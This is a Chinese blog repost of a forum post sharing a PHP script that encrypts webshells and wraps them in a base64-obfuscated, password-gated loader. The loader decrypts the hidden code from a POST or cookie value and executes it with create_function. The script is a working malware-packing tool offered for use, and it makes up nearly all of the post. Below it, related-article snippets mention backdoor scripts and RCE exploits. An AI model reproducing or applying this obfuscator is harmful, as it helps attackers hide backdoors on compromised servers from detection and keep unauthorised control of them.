后门加密脚本

最新推荐文章于 2024-07-04 17:01:37 发布
最新推荐文章于 2024-07-04 17:01:37 发布
阅读量102 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hookjoy/p/4357721.html
版权

作者:imspider

原文地址:https://www.t00ls.net/thread-29463-1-1.html

根据这篇帖子的算法写了个简单的文件加密:https://www.t00ls.net/thread-29456-1-1.html,什么大马小马加密出来的效果一模一样。

<?php 
$file = 'D:/Web/index.php'; /*要加密的文件*/
$pass = '123456'; /*登录密码*/

function enc($code,$pass) {
        $len  = strlen($code);
        for($i = 0; $i < $len; $i++) {
                $pass .= $code[$i];
                $code[$i] = chr((ord($code[$i]) + ord($pass[$i])) % 256);
        }
        $code = base64_encode($code);
        $temp = str_split($code,80);
        $newc = join("\r\n",$temp);
        return $newc;
}

$code = file_get_contents($file);
$code = base64_encode(' ?>'.$code.'<?php ');
$code = 'eval(base64_decode(\''.$code.'\'));exit;';
$code = gzdeflate($code);
$pass = md5($pass).substr(md5(strrev($pass)),0,strlen($pass));

$out  = base64_decode('PD9waHANCiR3cF9fd3AgPSAnYmFzZScgLiAoMzIgKiAyKSAuICdfZGUnIC4gJ2NvZGUnOw0KJHdwX193cCA9ICR3cF9fd3Aoc3RyX3JlcGxhY2UoYXJyYXkoIlxyIiwiXG4iKSwgYXJyYXkoJycsJycpLCAn').enc($code,$pass);
$out .= base64_decode('JykpOw0KJHdwX3dwID0gaXNzZXQoJF9QT1NUWyd3cF93cCddKSA/ICRfUE9TVFsnd3Bfd3AnXSA6IChpc3NldCgkX0NPT0tJRVsnd3Bfd3AnXSkgPyAkX0NPT0tJRVsnd3Bfd3AnXSA6IE5VTEwpOw0KaWYgKCR3cF93cCAhPT0gTlVMTCkgew0KICAgICR3cF93cCA9IG1kNSgkd3Bfd3ApIC4gc3Vic3RyKG1kNShzdHJyZXYoJHdwX3dwKSksIDAsIHN0cmxlbigkd3Bfd3ApKTsNCiAgICBmb3IgKCR3cF9fX3dwID0gMDsgJHdwX19fd3AgPCA=').strlen($code);
$out .= base64_decode('OyAkd3BfX193cCsrKSB7DQogICAgICAgICR3cF9fd3BbJHdwX19fd3BdID0gY2hyKChvcmQoJHdwX193cFskd3BfX193cF0pIC0gb3JkKCR3cF93cFskd3BfX193cF0pKSAlIDI1Nik7DQogICAgICAgICR3cF93cC49ICR3cF9fd3BbJHdwX19fd3BdOw0KICAgIH0NCiAgICBpZiAoJHdwX193cCA9IEBnemluZmxhdGUoJHdwX193cCkpIHsNCiAgICAgICAgaWYgKGlzc2V0KCRfUE9TVFsnd3Bfd3AnXSkpIEBzZXRjb29raWUoJ3dwX3dwJywgJF9QT1NUWyd3cF93cCddKTsNCiAgICAgICAgJHdwX19fd3AgPSBjcmVhdGVfZnVuY3Rpb24oJycsICR3cF9fd3ApOw0KICAgICAgICB1bnNldCgkd3BfX3dwLCAkd3Bfd3ApOw0KICAgICAgICAkd3BfX193cCgpOw0KICAgIH0NCn0gPz48Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0Ij48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0id3Bfd3AiIHZhbHVlPSIiLz48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iJmd0OyIvPjwvZm9ybT4=');

echo '<pre>';
echo htmlspecialchars($out);
echo '</pre>';
?>

 

转载于:https://www.cnblogs.com/hookjoy/p/4357721.html

weixin_33933118
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
某商城系统 RCE漏洞复现
0xSec
12-11 1127
某商城系统的api/testOrderSubmit模块下的preview方法存在命令执行漏洞,攻击者可以向服务器写入木马文件,直接获取服务器权限
shell:python写的后门连接脚本
04-01
标题 "shell:python写的后门连接脚本" 暗示了这个压缩包可能包含一个用Python编程语言编写的后门程序,后门通常是指在未经授权的情况下,为远程访问和控制系统而设计的秘密通道。这样的脚本可能被黑客用于非法入侵...
php的双重加密
爱菜鸟高高飞
06-30 649
原文地址:php的双重加密作者:零℃的吻利用PHP的内置函数crypt 进行再次加密 $pass = '123456'; echo "MD5加密后".md5($pass)."";              //不安全 echo "crypt加密后".crypt($pass)."";             // 比较乱的密码 刷新后还会变 echo "crypt复杂加密后".crypt($pa
Shell后门脚本
秦子腾
10-13 341
执行后会发送邮件,如上图,我们可以通过这个方式登入服务器。说明:请在云服务器中执行,执行脚本后会发生。登入服务器后可以使用命令。
PHP加密方式
MrWangisgoodboy的博客
02-15 6087
PHP加密方式分为单项散列加密,对称加密,非对称加密这几类。 像常用的MD5、hash、crypt、sha1这种就是单项散列加密,单项散列加密是不可逆的。 像URL编码、base64编码这种就是对称加密,是可逆的,就是说加密解密都是用的同一秘钥。 除此外就是非对称加密加密和解密的秘钥不是同一个,如果从安全性而言,加密的信息如果还想着再解密回来,非对称加密无疑是最为安全的方式 MD5加密 md5加密算法在PHP中是最常见的加密算法,这个算法是不可逆的,通常用于加密用户的密码等信息来保证用户的信息.
Shift后门加密加强(共享版)
08-20
Shift后门加密加强(共享版)是一款针对计算机安全领域的工具,主要用于提高系统后门的安全性和隐蔽性。在网络安全中,后门通常被用于远程控制或监控目标系统,但同时也可能被恶意用户利用来入侵和窃取信息。这款工具...
Netray:python写的后门连接脚本
04-06
在编写后门脚本时,Python的优势在于其丰富的网络编程库,如socket、asyncio、paramiko等,这些库可以帮助开发者轻松实现网络通信和加密功能。 在Netray项目中,可能包含以下几个关键知识点: 1. **Socket编程**:...
AWD比赛各类必备脚本
07-09
这类脚本可能包含了隐蔽读取和传输数据的方法,比如加密通信和利用系统日志漏洞。 8. **批量修改SSH配置**:在大规模攻防中,可能需要快速更改多个服务器的SSH配置,以增强安全性或实施攻击。这需要了解SSH协议和...
Webshell后门查杀
12-20
3. **代码审计**:对网站源代码进行全面审计,查找可疑的PHP、ASP、JSP等脚本,尤其是那些没有正常业务逻辑,或者使用了加密、混淆技术的代码。 4. **文件哈希对比**:收集系统中所有合法文件的哈希值,并定期进行...
陌屿在线PHP文件云加密v6.1
03-28
1、美化后台模板; 2、在线更新检测; 3、全站操作记录(记录操作者IP地址); 4、新加浏览器跳转; 5、新加代理注册开关。
PHP解密专家(完全免费真对zend加密的PHP文件,可获得zend 加密后的php文件的源码)
01-21
PHP解密专家(完全免费真对zend加密的PHP文件,可获得zend 加密后的php文件的源码) DeZend是一个专业对用Zend Encoder/SafeGuard, ionCube, SourceGuardian,phpcipher、codelock或SourceCop加密过的PHP文件进行破解的网站, 它主要运用密码分析、解压缩和反编译技术将经编码/加密过的PHP文件还原为可阅读、可执行的PHP源文件。
php双md5使用方法,php进行md5加密简单实例方法
weixin_34472954的博客
03-20 304
直接可以使用md5()函数,对内容进行加密,如:md5($admin_pw)把这段密文分割成若干段,对每段都进行一次MD5运算,然后把这堆密文连成一个超长的字符串,最后再进行一次MD5运算,得到仍然是长度为32位的密文。//把密文分割成两段,每段16个字符function md5_2_1($data){//先把密码加密成长度为32字符的密文$data = md5($data);//把密码分割成两段...
php突发流量,php防止刷流量攻击
weixin_34478373的博客
03-09 237
Warning: strncmp() has been disabled for security reasons in /www/web/default/blog/public_html/wp-includes/formatting.php on line 117Warning: strncmp() has been disabled for security reasons in /www...
Nginx+PHP 配置漏洞:静态文件都可以当作 PHP 解析
weixin_33851177的博客
08-17 351
这个漏洞严格上说并不是 Nginx 和 PHP 本身的漏洞造成的,而是由配置造成的。在我之前写的许多配置中,都普遍存在这个漏洞。 简易检测方法:打开 Nginx + PHP 服务器上的任意一张图片,如: http://hily.me/test.png 如果在图片链接后加一串 /xxx.php (xxx为任意字符)后,如: http://hily.me/test.png/xxx.php 图...
6种php加密解密方法
slqgenius的博客
01-13 1058
原文:https://www.cnblogs.com/kinwing/p/11450904.html 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php functionencryptDecr...
安全开发-Vsftpd2.3.4后门利用脚本编写
niqiu320的博客
05-12 478
靶场环境 定位 环境 IP Address 攻击机 Python3.8 主机ip 靶机 Metasploitable2 靶机ip 靶机:Metasploitable2 用户名:msfadmin 密码:msfadmin 步骤一:主机FTP登录 cmd->ftp 主机IP->回车->任意数字或字母:)->回车->任意密码->回车 以上操作完成后即可开启后门侦听6200端口 测试:可在靶机中输入:netstat -aupto | grep 6200
迅速学会PHP加密解密技巧
一米阳光
04-14 4271
闲话少说,先将它们打包成一个文件就叫fun.php吧 < ?php function passport_encrypt($txt, $key) { srand((double)microtime() * 1000000); $encrypt_key = md5(rand(0, 32000)); $ctr = 0; $tmp = ''; for($i = 0;$i <
php的六种加密方式(可逆,不可逆)
热门推荐
li_lening的博客
07-04 4万+
1. MD5加密string md5 ( string $str [, bool $raw_output = false ] )参数str  --  原始字符串。raw_output  --  如果可选的 raw_output 被设置为 TRUE,那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。这是一种不可逆加密,执行如下的代码$password = '123456';echo md5...
实战某大型连锁企业域渗透
最新发布
Ms08067安全实验室
07-04 944
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书实战域渗透测试流程对黑客来说,拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段,从而一步步拿下域控制器的呢?本次将从一张拓扑图开始,和大家一起梳理域的相关知识,并串联内网的各类攻击技术。实验环境概述 下图是一张某公司(虚构名:北京test公司)的网络拓扑示意图。该公司员工...
信息安全导论复习题-201012221
08-03
15. **VBS脚本病毒**:VBS病毒通过自我复制感染文件,其代码可以附加到其他程序中。 16. **引导型病毒**:并非所有引导型病毒都攻击BOOT扇区或主引导扇区,它们有多种感染方式。 17. **蠕虫病毒**:蠕虫病毒能自我...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值